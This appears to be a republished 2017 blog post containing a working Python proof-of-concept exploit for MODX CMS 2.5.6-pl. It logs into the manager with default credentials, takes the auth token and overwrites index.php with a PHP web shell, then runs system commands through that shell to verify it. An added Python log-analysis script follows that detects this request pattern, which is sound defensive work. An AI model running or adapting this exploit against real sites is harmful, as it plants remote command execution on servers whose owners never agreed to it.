ModX CMS Proof Of Concept Shell Upload
Source: code610 blogspot com  Author: Sixteen  Published: 2017-06-01
c@kali:~/src/Napalm2.2/libs$ cat shell-modxcms.py
#!/usr/bin/env python
# shell-modxcms.py - upload shell for modx 2.5.6-pl
#     
# !! we need rwx in modx-webdir to go ;Z
#
# 30.05.217 @ code610 blogspot com
# 

import requests
import re

target=raw_input("Hostname> ")

print '[+] Preparing tests for ' + str(target)

session = requests.session()
sesslink = target + '/manager/'

print '[+] Preparing login request...'

data_login = {
        'login_context':'mgr',
        'modahsh':'',
        'returnUrl':'/manager/',
        'username':'user',
        'password':'bitnami',
        'login':'1'
}
data_link = sesslink
doLogin = session.post(data_link, data=data_login)
loginResp = doLogin.text

if 'Logout' in loginResp:
  print '[+] We are logged in ;]'

  # grab HTTP_MODAUTH to build params for shelluprequest
  modlink = target + '/manager/?a=media/browser'
  getmod = session.get(modlink)
  getmodresp = getmod.text

  modfind = re.compile('auth:"(.*?)"')
  modfound = re.search(modfind, loginResp)

  if modfound:
    token = modfound.group(1)

    print '[+] Found HTTP_MODAUTH token:', token

    # preparing shellup req
    shell_data = {
        'action':'browser/file/update',
        'HTTP_MODAUTH':token,
        'wctx':'',
        'source':'1',
        'file':'index.php',
        'content':'<?php system($_GET["x"]);'
    }
    shheader = {'modAuth':token}
    shellreq = target + '/connectors/index.php'
    shellup = session.post(shellreq, data=shell_data, headers=shheader)
    shresp = shellup.text

    print '[+] Shell should be ready now. Verifying:'
    shellme = target + '/index.php?x=id;uname -a;pwd'
    shverif = requests.get(shellme)
    print shverif.text

print ''
c@kali:~/src/Napalm2.2/libs$
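
Added example, not part of the original PoC or of MODX: a Python 3 access-log check built from the two requests the script above makes. It flags a client that POSTs to /connectors/index.php and then requests /index.php with an "x" query parameter. The combined log format, the 10-minute window, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Fields needed from a combined-format access log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*"'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Jun/2017:10:00:01 +0000] "POST /manager/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jun/2017:10:00:03 +0000] "POST /connectors/index.php HTTP/1.1" 200 64',
    '203.0.113.7 - - [01/Jun/2017:10:00:04 +0000] "GET /index.php?x=id;uname%20-a;pwd HTTP/1.1" 200 211',
    '198.51.100.9 - - [01/Jun/2017:10:05:00 +0000] "GET /index.php?id=4 HTTP/1.1" 200 9000',
    '192.0.2.44 - - [01/Jun/2017:10:06:00 +0000] "GET /index.php?x=1 HTTP/1.1" 200 9000',
]

def parse(line):
    """Return (ip, timestamp, method, split_url) or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], urlsplit(m["url"])

def find_suspects(lines, window=timedelta(minutes=10)):
    """Return (ip, connector_post_time, request_url) for each correlated pair."""
    last_post = {}  # ip -> time of that client's latest POST to the connector
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, url = rec
        if method == "POST" and url.path.endswith("/connectors/index.php"):
            last_post[ip] = ts
        elif (method == "GET" and url.path.endswith("/index.php")
              and "/connectors/" not in url.path):
            # The PoC's payload reads its command from query parameter "x".
            if "x" in parse_qs(url.query, keep_blank_values=True):
                posted = last_post.get(ip)
                if posted is not None and timedelta(0) <= ts - posted <= window:
                    hits.append((ip, posted, url.geturl()))
    return hits

if __name__ == "__main__":
    for ip, posted, url in find_suspects(SAMPLE):
        print(ip, posted.isoformat(), url)
```

A hit is a lead, not proof: confirm by comparing the web root's index.php against the copy shipped with the installed MODX release.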
